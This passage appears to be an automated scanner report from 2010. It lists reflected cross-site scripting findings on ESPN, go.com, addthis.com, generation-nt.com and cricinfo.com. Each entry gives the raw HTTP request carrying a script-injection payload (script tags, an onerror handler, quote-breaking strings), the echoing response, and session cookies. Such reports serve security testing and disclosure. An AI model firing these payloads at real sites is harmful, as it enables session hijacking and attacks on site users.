GET /en/entryc9d1a<script>alert(1)</script>bc676b3bd41 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 130 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryc9d1a<script>alert(1)</script>bc676b3bd41</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1f44<script>alert(1)</script>648104297fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf1f44<script>alert(1)</script>648104297fd/entryStats HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 138 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf1f44<script>alert(1)</script>648104297fd/entryStats</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73792<script>alert(1)</script>b498764bc6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryStats73792<script>alert(1)</script>b498764bc6c HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 135 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryStats73792<script>alert(1)</script>b498764bc6c</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f170a<script>alert(1)</script>a531fa92f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf170a<script>alert(1)</script>a531fa92f90/story HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf170a<script>alert(1)</script>a531fa92f90/story</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f72f3<script>alert(1)</script>5c58c16e8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/storyf72f3<script>alert(1)</script>5c58c16e8fd HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 130 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/storyf72f3<script>alert(1)</script>5c58c16e8fd</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33249<script>alert(1)</script>91aac71b8a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /capmon33249<script>alert(1)</script>91aac71b8a3/GetDE HTTP/1.1 Host: tredir.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: Close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: Barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/capmon33249<script>alert(1)</script>91aac71b8a3/GetDE</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52f38<script>alert(1)</script>9f1036eb171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /capmon/GetDE52f38<script>alert(1)</script>9f1036eb171 HTTP/1.1 Host: tredir.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: Close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: Barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/capmon/GetDE52f38<script>alert(1)</script>9f1036eb171</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27b93<img%20src%3da%20onerror%3dalert(1)>de2cba9602e was submitted in the REST URL parameter 2. This input was echoed as 27b93<img src=a onerror=alert(1)>de2cba9602e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /help/converting+mssql+mysql27b93<img%20src%3da%20onerror%3dalert(1)>de2cba9602e/ HTTP/1.1 Host: us.generation-nt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:41:13 GMT Server: Apache Set-Cookie: PHPSESSID=90fbf2d190c4da3595af171eaa54a551; expires=Mon, 08 Nov 2010 00:41:13 GMT; path=/ Expires: Sun, 07 Nov 2010 00:41:13 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Sun, 07 Nov 2010 00:41:13 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31525
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a0f'%3b48a4cb73200 was submitted in the REST URL parameter 4. This input was echoed as 71a0f';48a4cb73200 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/262688115/direct71a0f'%3b48a4cb73200 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7100 Content-Type: text/html Expires: 0 Connection: close Date: Sat, 06 Nov 2010 17:26:13 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 741ca'%3bd720ed68176 was submitted in the REST URL parameter 4. This input was echoed as 741ca';d720ed68176 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/iview/252677534/direct741ca'%3bd720ed68176/078115 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289020824-462365; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6329 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 07 Nov 2010 00:42:16 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e42e'%3be35830756e2 was submitted in the REST URL parameter 4. This input was echoed as 6e42e';e35830756e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/iview/254478378/direct6e42e'%3be35830756e2 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289009670-12378696; MUID=7C64E36835CB42C490BB034C0AD431C9;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6351 Content-Type: text/html Expires: 0 Connection: close Date: Sat, 06 Nov 2010 13:23:27 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecc24'%3bac3ed86a775 was submitted in the REST URL parameter 4. This input was echoed as ecc24';ac3ed86a775 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/265979671/directecc24'%3bac3ed86a775 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289020824-462365; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6253 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 07 Nov 2010 00:43:42 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efdc8"-alert(1)-"cb9f4d6ef72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpefdc8"-alert(1)-"cb9f4d6ef72 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 06 Nov 2010 17:30:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=dmj8vhf7t1i7jq7clkt9jii6j5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpefdc8"-alert(1)-"cb9f4d6ef72"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f03a6<script>alert(1)</script>0576009f73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpf03a6<script>alert(1)</script>0576009f73d HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 06 Nov 2010 17:30:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=e2vtlmnr1a9rli5mbavo6f0t60; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpf03a6<script>alert(1)</script>0576009f73d</strong> ...[SNIP]...
5.141. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c63"-alert(1)-"f4525469f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/66c63"-alert(1)-"f4525469f14 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 17:29:58 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 86592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/66c63"-alert(1)-"f4525469f14"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
5.142. http://www.cricinfo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cricinfo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e2"><script>alert(1)</script>8865afff4f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e51e2"><script>alert(1)</script>8865afff4f6=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=60 Content-Type: text/html; charset=UTF-8 X-Varnish: 711005270 X-Varnish-Cache: MISS X-Varnish: 894769522 Date: Sat, 06 Nov 2010 17:30:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 157965
